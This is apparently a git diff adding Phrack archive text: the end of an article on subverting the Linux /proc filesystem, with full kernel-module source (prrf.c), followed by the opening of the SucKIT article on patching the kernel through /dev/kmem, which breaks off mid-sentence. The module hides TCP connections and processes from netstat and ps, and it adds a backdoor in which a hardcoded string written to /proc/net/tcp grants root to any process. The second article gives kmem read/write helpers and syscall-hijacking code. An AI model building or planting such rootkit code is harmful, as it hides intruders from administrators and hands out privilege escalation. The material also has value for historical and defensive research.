+ * /proc file has a parent, but "subdir" is NULL for all
+ * non-directory entries).
+ *
+ * "get_info" is called at "read", while "fill_inode" is used to
+ * fill in file type/protection/owner information specific to the
+ * particular /proc file.
+ */
+struct proc_dir_entry {
+	unsigned short low_ino;
+	unsigned short namelen;
+	const char *name;
+	mode_t mode;
+	nlink_t nlink;
+	uid_t uid;
+	gid_t gid;
+	unsigned long size;
+	struct inode_operations * ops;
+	int (*get_info)(char *, char **, off_t, int, int);
+	void (*fill_inode)(struct inode *, int);
+	struct proc_dir_entry *next, *parent, *subdir;
+	void *data;
+	int (*read_proc)(char *page, char **start, off_t off,
+			int count, int *eof, void *data);
+	int (*write_proc)(struct file *file, const char *buffer,
+		unsigned long count, void *data);
+	int (*readlink_proc)(struct proc_dir_entry *de, char *page);
+	unsigned int count;	/* use count */
+	int deleted;		/* delete flag */
+};
+
+  The described "in-memory tree" will be unified by the VFS. This
+struct is a little different in 2.4 kernel:
+
+/*
+ * This is not completely implemented yet. The idea is to
+ * create an in-memory tree (like the actual /proc filesystem
+ * tree) of these proc_dir_entries, so that we can dynamically
+ * add new files to /proc.
+ *
+ * The "next" pointer creates a linked list of one /proc directory,
+ * while parent/subdir create the directory structure (every
+ * /proc file has a parent, but "subdir" is NULL for all
+ * non-directory entries).
+ *
+ * "get_info" is called at "read", while "owner" is used to protect module
+ * from unloading while proc_dir_entry is in use
+ */
+
+typedef int (read_proc_t)(char *page, char **start, off_t off,
+			int count, int *eof, void *data);
+typedef int (write_proc_t)(struct file *file, const char *buffer,
+			unsigned long count, void *data);
+typedef int (get_info_t)(char *, char **, off_t, int);
+
+struct proc_dir_entry {
+	unsigned short low_ino;
+	unsigned short namelen;
+	const char *name;
+	mode_t mode;
+	nlink_t nlink;
+	uid_t uid;
+	gid_t gid;
+	unsigned long size;
+	struct inode_operations * proc_iops;
+	struct file_operations * proc_fops;
+	get_info_t *get_info;
+	struct module *owner;
+	struct proc_dir_entry *next, *parent, *subdir;
+	void *data;
+	read_proc_t *read_proc;
+	write_proc_t *write_proc;
+	atomic_t count;		/* use count */
+	int deleted;		/* delete flag */
+	kdev_t  rdev;
+};
+
+  Years of development did not complete it. Err.. complete it, yet. But
+well enough, it changed. get_info function prototype lost a argument.
+Working around this makes portable code a bit messy.
+
+  Note that there are three new entries while one entry, readlink_proc,
+was removed. Also note, the file operation struct was moved from the
+inode operations into the proc_dir_entry struct. Working around this
+is just fine, see section 3.
+
+
+--[ 2.3 - The proc_root
+
+  The Linux kernel exports the root inode of the proc filesystem, named
+proc_root. Hence, it is the root inode of the proc filesystem that the
+mountpoint, commonly /proc, is referring to. We can, starting there, go to
+any file in below that directory. However, there is one exception. The
+processes' directories can never be reached from proc_root. They are added
+dynamically, and presented to the VFS layer if readdir (inode operation) is
+called.
+
+  It should be made clear that proc_root is of type
+"struct proc_dir_entry".
+
+
+--[ 3 - Where to Go?
+
+  This chapter will introduce techiques to aquire even more abilities than
+commonly obtained by systemcall replacement.
+
+  The following functions and macros will be used in the code provided in
+these subsections (note: for implementation see appendix A):
+
+	As noted in section 2.2 we have to take care of a little change in
+	design:
+
+	#if defined (KERNEL_22)
+	#define FILE_OPS        ops->default_file_ops
+	#define INODE_OPS       ops
+	#elif defined (KERNEL_24)
+	#define FILE_OPS        proc_fops
+	#define INODE_OPS       proc_iops
+	#endif
+
+	struct proc_dir_entry *
+	traverse_proc (char *path, struct proc_dir_entry *start):
+	  On success, return a pointer to the proc file specified by
+	path. On failures, NULL is returned.
+	Start may either be NULL or an arbitrary proc_dir_entry; it
+	marks the point there the search begins.
+	The path may begin with "~/". If it does, the search starts at
+	proc_root.
+
+	int
+	delete_proc_file (char *path):
+	  This function will remove a file from the proc directory
+	lists. It will not free the memory the proc_dir_entry occupies,
+	thus making it possible to reintroduce it later on.
+
+
+--[ 3.1 - Securing?
+
+  The easiest modifications coming to mind are related to the first few
+fields in the proc_dir_entry. Namely uid, gid and mode. By changing them
+we can simply reissue and/or revoke the ability for certain users to access
+certain information. Side note here: some of the information accessable
+through /proc can be obtained in other ways.
+
+  An implementation may look like this:
+
+	proc_dir_entry *a = NULL;
+	a = traverse_proc ("~/ksyms", NULL);
+	if (a) {
+		/* reset permissions to 400 (r--------): */
+		a->mode -= (S_IROTH | S_IRGRP);
+	}
+	a = traverse_proc ("~/net", NULL);
+	if (a) {
+		/* reset permissions to 750 (rwxr-x---): */
+		a->mode = S_IRWXU | S_IRGRP | S_IXGRP;
+		/* reset owner group to a special admin group id */
+		a->gid = 7350;
+	}
+
+  Another possibility for securing proc access is given in 3.5.
+
+
+--[ 3.2 - Denial of Service
+
+  Well, I will make this as short as possible. A malicious user might ap-
+ply changes to files to render parts of the system useless. Those, as
+mentioned above, can easily be undone. But if the malicious user
+simply unlinks a file it is lost:
+
+	/* oops, we forget to save the pointer ... */
+	delete_proc_file ("~/apm");
+
+  what actually happens on delete_proc_file calls is (simplified):
+	0. find proc_dir_entry of the file to delete (to_del)
+	1. find the proc_dir_entry that matches:
+	   proc->next->name == to_del->name
+	2. relink:
+	   proc->next = to_del->next
+
+
+--[ 3.3 - Connection Hiding
+
+  The netstat utility uses the proc file ~/net/* files to show e.g. tcp
+connections and their status, listening udp sockets etc. Read [4] for a
+complete discussion of netstat. Since we control the proc filesystem we
+are able to define what is read and what is not. The proc_dir_entry struct
+contains a function pointer named get_info which is called at file read.
+By redirecting this we can take control of the contents of files in /proc.
+
+  Take care of the file format in different version. Files mentioned
+above changed their format from 2.2.x to 2.4.x. Notably, the same function
+can be used for redirection. Lets see how this develops in 2.5.x kernels.
+  
+  an example (for 2.2.x kernels, for differences to 2.4.x kernel see section
+2.2):
+
+	/* we save the original get_info */
+	int (*saved_get_info)(char *, char **, off_t, int, int);
+	proc_dir_entry *a = NULL;
+
+	/* the new get_info ... */
+	int
+	new_get_info (char *a, char **b, off_t c, int d, int e) {
+		int x = 0;
+		x = saved_get_info (a, b, c, d, e);
+		/* do something here ... */
+		return x;
+	}
+
+	a = traverse_proc ("~/net/tcp", NULL);
+	if (a) {
+		/*
+		 * we just set the get_info pointer to point to our new
+		 * function. to undo this changes simply restore the pointer. 
+		 */
+		saved_get_info = a->get_info;
+		a->get_info = &new_get_info;
+	}
+
+  Appendix A offers a example implementation.
+
+
+--[ 3.4 - Elevation of Privileges
+
+  Often a system call is utilized to give under a certian condition extra
+privileges to a user. We will not redirect a system call for this. Redirecting
+the read file operation of a file is sufficient hence (1) it allows a user to
+send data into the kernel and (2) it is considerable stealthy if we choose the
+right pattern or the right file (elevating a tasks id's to 0 if it writes a '1'
+to /proc/sys/net/ipv4/ip_forward is certainly a bad idea).
+
+  Some code will explain this.
+
+	a = traverse_proc ("~/ide/drivers", NULL);
+	if (a) {
+		/*
+		 * the write function is called if the file is written to.
+		 */
+		a->FILE_OPS->write = &new_write;
+	}
+
+  It is a good idea to save the pointer you overwrite. If you remove the module
+memory containing the function might free'ed. It can bring havoc to a system if
+it subsequently calls a NULL pointer. The curious reader is encouraged to read
+appendix A.
+
+
+--[ 3.5 - Process Hiding
+
+  What happens if a directory is to be read? You have to find its inode, then
+you read its entries using readdir. VFS offers a unified interface to this,
+we dont care and reset the pointer to readdir of the parent inode in question.
+
+  Since the process directories are directly under proc_root there is no need
+for searching the parent inode. Note that we do not hide the entries from the
+user by sorting them out, but by not writing them to the users memory.
+
+
+	/* a global pointer to the original filldir function */
+	filldir_t real_filldir;
+
+	static int new_filldir_root (void * __buf, const char * name,
+			int namlen, off_t offset, ino_t ino) {
+		/*
+		 * if the dir entry, that should be added has a stupid name
+		 * indicate a successful addition and do nothing.
+		 */
+		if (isHidden (name))
+			return 0;
+		return real_filldir (__buf, name, namlen, offset, ino);
+	}
+
+
+	/* readdir, business as usual. */
+	int new_readdir_root (struct file *a, void *b, filldir_t c) {
+		/*
+		 * Note: there is no need to set this pointer every
+		 * time new_readdir_root is called. But we have to set
+		 * it once, when we replace the readdir function. If we
+		 * know where filldir lies at that time this should be
+		 * changed. (yes, filldir is static).
+		 */
+		real_filldir = c;
+		return old_readdir_root (a, b, new_filldir_root);
+	}
+
+
+	/* replace the readdir file operation. */
+	proc_root.FILE_OPS->readdir = new_readdir_root;
+
+  If the process that should be added last is hidden the list of entries is
+not properly linked since our filldir does not care about linking. However,
+this is very unlikely to happen. The user has all power he needs to avoid
+this condition.
+
+  It is possible to just make files unaccessable within /proc by replacing
+the lookup inode operation of the parent:
+
+	struct dentry *new_lookup_root (struct inode *a, struct dentry *b) {
+		/*
+		 * will result in:
+		 * "/bin/ls: /proc/<d_iname>: No such file or directory"
+		 */
+		if (isHidden (b->d_iname))
+			return NULL;
+		return old_lookup_root (a, b);
+	}
+
+	/* ... enable the feature ... */
+	proc_root.INODE_OPS->lookup = &new_lookup_root;
+
+  E.g. this can be used to establish fine grained access rules.
+
+
+--[ 3.6 - Other Applications
+
+  Now, lets have a look at what files wait to become modified. In the /proc/net
+directory are ip_fwnames (defining chain names) and ip_fwchains (rules).
+They are read by ipchains (not by iptables) if they are queried to list the
+filter rules. As mentioned above, there is a file named tcp, listening all
+existing tcp sockets. such a file exists for udp, too. the file raw lists
+raw sockets. sockstat contains statistics on socket use. A carefully written 
+backdoor has to sync between the (tcp|udp|...) files and this one. The arp 
+utility uses /proc/net/arp to gather its information. route uses the
+/proc/net/route file. Read their manpages and look out for the sections
+named "FILES" and "SEE ALSO". However, checking the files is only half of
+the work, e.g. ifconfig uses a proc file (dev) plus ioctl's to gether its
+information.
+
+  As you can see, there are many many applications to these techniques. It
+is up to you to write new get_info functions to filter their output or to
+add new evil entries (non existing problems are the hardest to debug).
+
+
+--[ 4 - Conclusion
+
+  As we saw in section 3.2 - 3.6 there are several possibilities to weaken
+the security in the Linux kernel. Existing kernel protection mechanisms, as
+[5] and [6] will not prevent them, they check only for well known, system call
+based, backdooring; we completely worked around it. Disabling LKM support will
+only prevent the specific implementation included here to work (because it is
+a LKM).
+
+  Changing the proc structures by accessing /dev[k]mem is easy since most
+data of the inodes is static. Therefore they can be possibly found by simple
+pattern matching (only the function pointers and next/parent/subdir pointers
+will be different).
+
+  A important goal, hiding of any directory and file, was not passed. This does
+not imply that it can not be reached by proc games. A possiblity could be to
+hardcode needed binaries into the kernel images proc structures, or on systems
+using sdram, leting them occupy unused memory space. Quiet another possibility
+might be to attack the VFS layer. That, of course, is the story of another
+article.
+
+  Finally some words about the implementation appended. I strongly urge the read
+to use it ONLY as a proof of concept. The author can and must not be made
+responsible for any, including but not limited to, incidental or consequential
+damage, data loss or service outage. The code is provided "AS IS" and WITHOUT
+ANY WARRENTY. USE IT AT YOU OWN RISK. The code is know to compile and run on
+2.2.x and 2.4.x kernels.
+
+
+--[ 5 - Reference
+
+[1] "Overview of the Virtual File System", Richard Gooch <rgooch@atnf.csiro.au>
+    http://www.atnf.csiro.au/~rgooch/linux/docs/vfs.txt
+[2] "Operating Systems, Design and Implementation", by Andrew S. Tanenbaum and
+    Albert S. Woodhull
+    ISBN 0-13-630195-9
+[3] RUNTIME KERNEL KMEM PATCHING, Silvio Cesare <silvio@big.net.au>
+    http://www.big.net.au/~silvio/runtime-kernel-kmem-patching.txt
+[4] netstat
+    see netstat(1) for further information.
+[5] StMichael, by Tim Lawless <lawless@netdoor.com>
+    http://sourceforge.net/projects/stjude
+[6] KSTAT, by FuSyS <fusys@s0ftpj.org>
+    http://s0ftpj.org/tools/kstat.tgz
+[7] proc pseudo-filesystem man page
+    see proc(5)
+[8] "T H E  /proc   F I L E S Y S T E M", Terrehon Bowden <terrehon@pacbell.net>,
+    Bodo Bauer <bb@ricochet.net> and Jorge Nerin <comandante@zaralinux.com>
+    ~/Documentation/filesystems/proc.txt (only in recent kernel source trees!)
+    http://skaro.nightcrawler.com/~bb/Docs/Proc
+
+
+--[ Appendix A: prrf.c
+
+<++> ./prrf.c
+/*
+ * prrf.c
+ *
+ * LICENSE:
+ * this file may be copied or duplicated in any form, in
+ * whole or in part, modified or not, as long as this
+ * copyright notice is prepended UNMODIFIED.
+ *
+ * This code is proof of concept. The author can and must
+ * not be made responsible for any, including but not limited
+ * to, incidental or consequential damage, data loss or
+ * service outage. The code is provided "AS IS" and WITHOUT
+ * ANY WARRENTY. USE IT AT YOU OWN RISK.
+ *
+ * palmers / teso - 12/02/2001
+ */
+
+/*
+ * NOTE: the get_info redirection DOES NOT handle small buffers.
+ *       your system _might_ oops or even crash if you read less
+ *       bytes then the file contains!
+ */
+
+/*
+ * 2.2.x #define KERNEL_22
+ * 2.4.x #define KERNEL_24
+ */
+#define KERNEL_22	1
+#define DEBUG		1
+
+#define __KERNEL__
+#define MODULE
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <sys/syscall.h>
+#include <linux/config.h>
+#include <linux/types.h>
+#include <linux/slab.h>
+#include <linux/smp_lock.h>
+#include <linux/fd.h>
+#include <linux/fs.h>
+#include <linux/proc_fs.h>
+#include <linux/sched.h>
+#include <asm/uaccess.h>
+
+
+/*
+ * take care of proc_dir_entry design
+ */
+#if defined (KERNEL_22)
+  #define FILE_OPS	ops->default_file_ops
+  #define INODE_OPS	ops
+#elif defined (KERNEL_24)
+  #define FILE_OPS	proc_fops
+  #define INODE_OPS	proc_iops
+#endif
+
+#define BUF_SIZE	65535
+#define AUTH_STRING	"ljdu3g9edaoih"
+
+
+struct hide_proc_net
+{
+  int			id;		/* entry id, useless ;) */
+  char			*local_addr,	/* these should be self explaining ... */
+			*remote_addr,
+  			*local_port,
+			*remote_port;
+};
+
+/*
+ * global lst_entry:
+ * set by traverse_proc, used by delete_proc_file.
+ */
+struct proc_dir_entry	*lst_entry = NULL;
+
+/*
+ * some function pointers for saving original functions.
+ */
+#if defined (KERNEL_22)
+  int (*old_get_info_tcp) (char *, char **, off_t, int, int);
+#elif defined (KERNEL_24)
+  get_info_t *old_get_info_tcp;
+#endif
+
+ssize_t (*old_write_tcp) (struct file *, const char *, size_t, loff_t *);
+struct dentry * (*old_lookup_root) (struct inode *, struct dentry *);
+int (*old_readdir_root) (struct file *, void *, filldir_t);
+filldir_t real_filldir;
+
+
+/*
+ * rules for hiding connections
+ */
+struct hide_proc_net hidden_tcp[] = {
+	{0, NULL, NULL, ":4E35", NULL},		/* match connection from ANY:ANY to ANY:20021 */
+	{1, NULL, NULL, NULL, ":4E35"},		/* match connection from ANY:20021 to ANY:ANY*/
+	{2, NULL, NULL, ":0016", ":4E35"},	/* match connection from ANY:20021 to ANY:22 */
+	{7350, NULL, NULL, NULL, NULL}		/* stop entry, dont forget to prepend this one */
+};
+
+
+/*
+ * get_task:
+ * find a task_struct by pid.
+ */
+struct task_struct *get_task(pid_t pid)
+{
+	struct task_struct	*p = current;
+
+	do {
+		if (p->pid == pid)
+		return p;
+		p = p->next_task;
+	} while (p != current);
+	return NULL;
+}
+
+
+/*
+ * __atoi:
+ * atoi!
+ */
+int __atoi(char *str)
+{
+	int	res = 0,
+		mul = 1;
+
+	char *ptr;
+	for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
+		if (*ptr < '0' || *ptr > '9')
+			return (-1);
+		res += (*ptr - '0') * mul;
+		mul *= 10;
+	}
+	return (res);
+}
+
+
+/*
+ * get_size_off_tcp:
+ * get the size of the modified /proc/net/tcp file.
+ */
+static off_t get_size_off_tcp (char **start)
+{
+  off_t		x = 0,
+		xx = 0,
+		xxx = 0,
+		y = 0;
+  char		tmp_buf[BUF_SIZE + 1];
+
+  do
+    {
+      x += y;
+      xx += xxx;
+      y = __new_get_info_tcp (tmp_buf, start, x, BUF_SIZE, 0, 1, &xxx);
+    } while (y != 0);
+
+  return x - xx;
+}
+
+
+/*
+ * deny_entry:
+ * check connection parameters against our access control list.
+ * for all non-NULL fields of a entry the supplied parameters
+ * must match. Otherways the socket will show up.
+ */
+int deny_entry (char *la, char *lp, char *ra, char *rp)
+{
+  int		x = 0,
+		y,
+		z;
+
+  while (hidden_tcp[x].id != 7350)
+    {
+      y = 0;
+      z = 0;
+
+      if (hidden_tcp[x].local_addr != NULL)
+	{
+	  if (!strncmp (la, hidden_tcp[x].local_addr, 8))
+	    y++;
+	}
+      else
+	z++;
+
+      if (hidden_tcp[x].remote_addr != NULL)
+	{
+	  if (!strncmp (ra, hidden_tcp[x].remote_addr, 8))
+	    y++;
+	}
+      else
+	z++;
+
+      if (hidden_tcp[x].local_port != NULL)
+	{
+	  if (!strncmp (lp, hidden_tcp[x].local_port, 5))
+	    y++;
+	}
+      else
+	z++;
+
+      if (hidden_tcp[x].remote_port != NULL)
+	{
+	  if (!strncmp (rp, hidden_tcp[x].remote_port, 5))
+	    y++;
+	}
+      else
+	z++;
+
+      if ((z != 4) && ((y + z) == 4))
+	return 1;
+      x++;
+    }
+  return 0;
+}
+
+
+/*
+ * __new_get_info_tcp:
+ * filter the original get_info output. first call the old function,
+ * then cut out unwanted lines.
+ * XXX: very small buffers will make very large problems.
+ */
+int __new_get_info_tcp (char *page, char **start, off_t pos, int count, int f, int what, off_t *fx)
+{
+  char		tmp_l_addr[8],
+		tmp_l_port[5],
+  		tmp_r_addr[8],
+		tmp_r_port[5],		/* used for acl checks */
+		*tmp_ptr,
+		*tmp_page;
+  int		x = 0,
+		line_off = 0,
+		length,
+		remove = 0,
+		diff,
+		m;
+
+#if defined (KERNEL_22)
+  x = old_get_info_tcp (page, start, pos, count, f);
+#elif defined (KERNEL_24)
+  x = old_get_info_tcp (page, start, pos, count);
+#endif
+
+  if (page == NULL)
+    return x;
+
+  while (*page)
+    {
+      tmp_ptr = page;
+      length = 28;
+      while (*page != '\n' && *page != '\0')	/* check one line */
+	{
+	/*
+	 * we even correct the sl field ("line number").
+	 */
+	  if (line_off)
+	    {
+	      diff = line_off;
+
+	      if (diff > 999)
+		{
+	          m = diff / 1000;
+	          page[0] -= m;
+	          diff -= (m * 1000);
+		}
+	      if (diff > 99)
+		{
+	          m = diff / 100;
+	          page[1] -= m;
+	          diff -= (m * 100);
+		}
+	      if (diff > 9)
+		{
+	          m = diff / 10;
+	          page[2] -= m;
+	          diff -= (m * 10);
+		}
+	      if (diff > 0)
+		page[3] -= diff;
+
+	      if (page[0] > '1')
+		page[0] = ' ';
+	      if (page[1] > '1')
+		page[1] = ' ';
+	      if (page[2] > '1')
+		page[2] = ' ';
+	    }
+
+	  page += 6;		/* jump to beginning of local address, XXX: is this fixed? */
+	  memcpy (tmp_l_addr, page, 8);
+
+	  page += 8;		/* jump to beginning of local port */
+	  memcpy (tmp_l_port, page, 5);
+
+	  page += 6;		/* jump to remote address */
+	  memcpy (tmp_r_addr, page, 8);
+
+	  page += 8;		/* jump to beginning of local port */
+	  memcpy (tmp_r_port, page, 5);
+
+          while (*page != '\n')	/* jump to end */
+	    {
+	      page++;
+	      length++;
+	    }
+
+	  remove = deny_entry (tmp_l_addr, tmp_l_port, tmp_r_addr, tmp_r_port);
+	}
+      page++;			/* '\n' */
+      length++;
+
+      if (remove == 1)
+	{
+	  x -= length;
+	  if (what)		/* count ignored bytes? */
+	    *fx += length;
+	  tmp_page = page;
+	  page = tmp_ptr;
+
+	  while (*tmp_page)	/* move data backward in page */
+	    *tmp_ptr++ = *tmp_page++;
+
+/* zero lasting data (not needed)
+	  while (length--)
+	    *tmp_ptr++ = 0;
+	  *tmp_ptr = 0;
+*/
+	  line_off++;
+	  remove = 0;
+	}
+    }
+  return x;
+}
+
+
+/*
+ * new_get_info_tcp:
+ * we need this wrapper to avoid duplication of entries. we have to
+ * check for "end of file" of /proc/net/tcp, where eof lies at
+ * file length - length of all entries we remove.
+ */
+#if defined (KERNEL_22)
+int new_get_info_tcp (char *page, char **start, off_t pos, int count, int f)
+{
+#elif defined (KERNEL_24)
+int new_get_info_tcp (char *page, char **start, off_t pos, int count)
+{
+  int		f = 0;
+#endif
+  int		x = 0;
+  off_t		max = 0;
+ 
+  max = get_size_off_tcp (start);
+  if (pos > max)
+    return 0;
+  x = __new_get_info_tcp (page, start, pos, count, f, 0, NULL);
+
+  return x;
+}
+
+
+/*
+ * new_write_tcp:
+ * a write function that performs misc. tasks as privilege elevation etc.
+ * e.g.:
+ * echo AUTH_STRING + nr. > /proc/net/tcp == uid 0 for pid nr.
+ */
+ssize_t new_write_tcp (struct file *a, const char *b, size_t c, loff_t *d)
+{
+  char *tmp = NULL, *tmp_ptr;
+  tmp = kmalloc (c + 1, GFP_KERNEL);
+
+  copy_from_user (tmp, b, c);
+  if (tmp[strlen (tmp) - 1] == '\n')
+    tmp[strlen (tmp) - 1] = 0;
+
+  if (!strncmp (tmp, AUTH_STRING, strlen (AUTH_STRING)))
+    {
+      struct task_struct *x = NULL;
+      tmp_ptr = tmp + strlen (AUTH_STRING) + 1;
+      if ((x = get_task (__atoi (tmp_ptr))) == NULL)
+	{
+	  kfree (tmp);
+	  return c; 
+	}
+      x->uid = x->euid = x->suid = x->fsuid = 0;     
+      x->gid = x->egid = x->sgid = x->fsgid = 0;     
+    }
+
+  kfree (tmp);
+  return c;
+}
+
+
+/*
+ * some testing ...
+ */
+struct dentry *new_lookup_root (struct inode *a, struct dentry *b)
+{
+  if (b->d_iname[0] == '1')
+    return NULL;	/* will result in: "/bin/ls: /proc/1*: No such file or directory" */
+  return old_lookup_root (a, b);
+}
+
+
+static int new_filldir_root (void * __buf, const char * name, int namlen, off_t offset, ino_t ino)
+{
+  if (name[0] == '1' && name[1] == '0')	/* hide init */
+    return 0;
+/*
+ * hiding the last task will result in a wrong linked list.
+ * that leads e.g. to crashes (ps).
+ */
+  return real_filldir (__buf, name, namlen, offset, ino);
+}
+
+int new_readdir_root (struct file *a, void *b, filldir_t c)
+{
+  real_filldir = c;
+  return old_readdir_root (a, b, new_filldir_root);
+}
+
+
+/*
+ * traverse_proc:
+ * returns the directory entry of a given file. the function will traverse
+ * thru the filesystems structure until it found the matching file.
+ * the pr argument may be either NULL or a starting point for the search.
+ * path is a string. if it begins with '~' and pr is NULL the search starts
+ * at proc_root.
+ */
+struct proc_dir_entry *traverse_proc (char *path, struct proc_dir_entry *pr)
+{
+  int			x = 0;
+  char			*tmp = NULL;
+
+  if (path == NULL)
+    return NULL;
+
+  if (path[0] == '~')
+    {
+      lst_entry = &proc_root;
+      return traverse_proc (path + 2, (struct proc_dir_entry *) proc_root.subdir);
+    }
+
+  while (path[x] != '/' && path[x] != 0)
+    x++;
+
+  tmp = kmalloc (x + 1, GFP_KERNEL);
+  memset (tmp, 0, x + 1);
+  memcpy (tmp, path, x);
+
+  while (strcmp (tmp, (char *) pr->name))
+    {
+      if (pr->subdir != NULL && path[x] == '/')
+        {
+          if (!strcmp (tmp, (char *) pr->subdir->name))
+	    {
+	      kfree (tmp);
+	      lst_entry = pr;
+	      return traverse_proc (path + x + 1, pr->subdir);
+	    }
+        }
+      lst_entry = pr;
+      pr = pr->next;
+      if (pr == NULL)
+	{
+	  kfree (tmp);
+	  return NULL;
+	}
+    }
+
+  kfree (tmp);
+  if (*(path + x) == 0)
+    return pr;
+  else
+    {
+      lst_entry = pr;
+      return traverse_proc (path + x + 1, pr->subdir);
+    }
+}
+
+
+/*
+ * delete_proc_file:
+ * remove a file from of the proc filesystem. the files inode will still exist but it will
+ * no longer be accessable (not pointed to by any other proc inode). the subdir pointer will
+ * be copy'ed to the the subdir pointer of the preceeding inode.
+ * returns 1 on success, 0 on error.
+ */
+int delete_proc_file (char *name)
+{
+  struct proc_dir_entry	*last = NULL;
+  char			*tmp = NULL;
+  int			i = 0;	/* delete subdir? */
+
+  last = traverse_proc (name, NULL);
+
+  if (last == NULL)
+    return 0;
+  if (lst_entry == NULL)
+    return 0;
+
+  if (last->subdir != NULL && i)
+    lst_entry->subdir = last->subdir;
+
+  while (*name != 0)
+    {
+      if (*name == '/')
+        tmp = name + 1;
+      *name++;
+    }
+
+  if (!strcmp (tmp, lst_entry->next->name))
+    lst_entry->next = last->next;
+  else if (!strcmp (tmp, lst_entry->subdir->name))
+    lst_entry->subdir = last->next;
+  else
+    return 0;
+
+  return 1;
+}
+
+
+int init_module ()
+{
+  struct proc_dir_entry	*last = NULL;
+  last = traverse_proc ("~/net/tcp", NULL);
+
+  old_readdir_root = proc_root.FILE_OPS->readdir;
+  old_lookup_root = proc_root.INODE_OPS->lookup;
+  
+  proc_root.FILE_OPS->readdir = &new_readdir_root;
+  proc_root.INODE_OPS->lookup = &new_lookup_root;
+
+  if (last != NULL)
+    {
+#ifdef DEBUG
+      printk ("Installing hooks ....\n");
+#endif
+      old_get_info_tcp = last->get_info;
+      old_write_tcp = last->FILE_OPS->write;
+
+      last->get_info = &new_get_info_tcp;
+      last->FILE_OPS->write = &new_write_tcp;
+    }
+
+  return 0;
+}
+
+
+void cleanup_module ()
+{
+  struct proc_dir_entry	*last = NULL;
+  last = traverse_proc ("~/net/tcp", NULL);
+
+  proc_root.FILE_OPS->readdir = old_readdir_root;
+  proc_root.INODE_OPS->lookup = old_lookup_root;
+
+  if (last != NULL)
+    {
+#ifdef DEBUG
+      printk ("Removing hooks ....\n");
+#endif
+      last->get_info = old_get_info_tcp;
+      last->FILE_OPS->write = old_write_tcp;
+    }
+}
+<-->
diff --git a/phrack58/7.txt b/phrack58/7.txt
new file mode 100644
index 0000000..efec25b
--- /dev/null
+++ b/phrack58/7.txt
@@ -0,0 +1,4856 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3a, Phile #0x07 of 0x0e
+
+|=----------=[ Linux on-the-fly kernel patching without LKM ]=-----------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ sd <sd@sf.cz>, devik <devik@cdi.cz> ]=---------------=|
+|=----------------------=[ December 12th 2001 ]=-------------------------=|
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - /dev/kmem is our friend
+
+  3 - Replacing kernel syscalls, sys_call_table[]
+    3.1 - How to get sys_call_table[] without LKM ?
+    3.2 - Redirecting int 0x80 call sys_call_table[eax] dispatch
+
+  4 - Allocating kernel space without help of LKM support
+    4.1 - Searching kmalloc() using LKM support
+    4.2 - pattern search of kmalloc()
+    4.3 - The GFP_KERNEL value
+    4.4 - Overwriting a syscall
+
+  5 - What you should take care of
+
+  6 - Possible solutions
+
+  7 - Conclusion
+
+  8 - References
+
+  9 - Appendix: SucKIT: The implementation
+
+
+--[ 1 - Introduction
+
+  In the beginning, we must thank Silvio Cesare, who developed the
+technique of kernel patching a long time ago, most of ideas was stolen
+from him.
+
+  In this paper, we will discuss way of abusing the Linux kernel
+(syscalls mostly) without help of module support or System.map at all,
+so that we assume that the reader will have a clue about what LKM is,
+how a LKM is loaded into kernel etc. If you are not sure, look at some
+documentation (paragraph 6. [1], [2], [3])
+
+  Imagine a scenario of a poor man which needs to change some interesting
+linux syscall and LKM support is not compiled in. Imagine he have got a
+box, he got root but the admin is so paranoid and he (or tripwire) don't
+poor man's patched sshd and that box have not gcc/lib/.h
+needed for compiling of his favourite LKM rootkit. So there are
+some solutions, step by step and as an appendix, a full-featured
+linux-ia32 rootkit, an example/tool, which implements all the techinques
+described here.
+
+  Most of things described there (such as syscalls, memory addressing
+schemes ... code too) can work only on ia32 architecture. If someone
+investigate(d) to other architectures, please contact us.
+
+--[ 2 - /dev/kmem is our friend
+
+ "Mem is a character device file that is an image of the main memory of
+  the computer. It may be used, for example, to examine (and even patch)
+  the system."
+                  -- from the Linux 'mem' man page
+
+  For full and complex documentation about run-time kernel patching take a
+look at excellent Silvio's article about this subject [2].
+Just in short:
+  Everything we do in this paper with kernel space is done using the
+standard linux device, /dev/kmem. Since this device is mostly +rw only for
+root, you must be root too if you want to abuse it.
+Note that changing of /dev/kmem permission to gain access is not
+sufficient. After /dev/kmem access is allowed by VFS then there is second
+check in device/char/mem.c for capable(CAP_SYS_RAWIO) of process.
+
+  We should also note that there is another device, /dev/mem.
+It is physical memory before VM translation. It might be possible to use it
+if we were know page directory location. We didn't investigate this
+possibility.
+
+  Selecting address is done through lseek(), reading using read() and
+writing with help of write() ... simple.
+
+There are some helpful functions for working with kernel stuff:
+
+/* read data from kmem */
+static inline int rkm(int fd, int offset, void *buf, int size)
+{
+        if (lseek(fd, offset, 0) != offset) return 0;
+        if (read(fd, buf, size) != size) return 0;
+        return size;
+}
+
+/* write data to kmem */
+static inline int wkm(int fd, int offset, void *buf, int size)
+{
+        if (lseek(fd, offset, 0) != offset) return 0;
+        if (write(fd, buf, size) != size) return 0;
+        return size;
+}
+
+/* read int from kmem */
+static inline int rkml(int fd, int offset, ulong *buf)
+{
+        return rkm(fd, offset, buf, sizeof(ulong));
+}
+
+/* write int to kmem */
+static inline int wkml(int fd, int offset, ulong buf)
+{
+        return wkm(fd, offset, &buf, sizeof(ulong));
+}
+
+
+--[ 3 - Replacing kernel syscalls, sys_call_table[]
+
+  As we all know, syscalls are the lowest level of system functions (from
+viewpoint of userspace) in Linux, so we'll be interested mostly in them.
+Syscalls are grouped together in one big table (sct), it is just a
+one-dimension array of 256 ulongs (=pointers, on ia32 architecture),
+where indexing the array by a syscall number gives us the entrypoint of
+given syscall. That's it.
+
+An example pseudocode:
+
+/* as everywhere, "Hello world" is good for begginers ;-) */
+
+/* our saved original syscall */
+int (*old_write) (int, char *, int);
+        /* new syscall handler */
+        new_write(int fd, char *buf, int count) {
+        if (fd == 1) {  /* stdout ? */
+                old_write(fd, "Hello world!\n", 13);
+                return count;
+        } else {
+                return old_write(fd, buf, count);
+        }
+}
+
+old_write = (void *) sys_call_table[__NR_write]; /* save old */
+sys_call_table[__NR_write] = (ulong) new_write;  /* setup new one */
+
+/* Err... there should be better things to do instead fucking up console
+   with "Hello worlds" ;) */
+
+This is the classic scenario of a various LKM rootkits (see paragraph 7),
+tty sniffers/hijackers (the halflife's one, f.e. [4]) where it is guaranted
+that we can import sys_call_table[] and manipulate it in a correct manner,
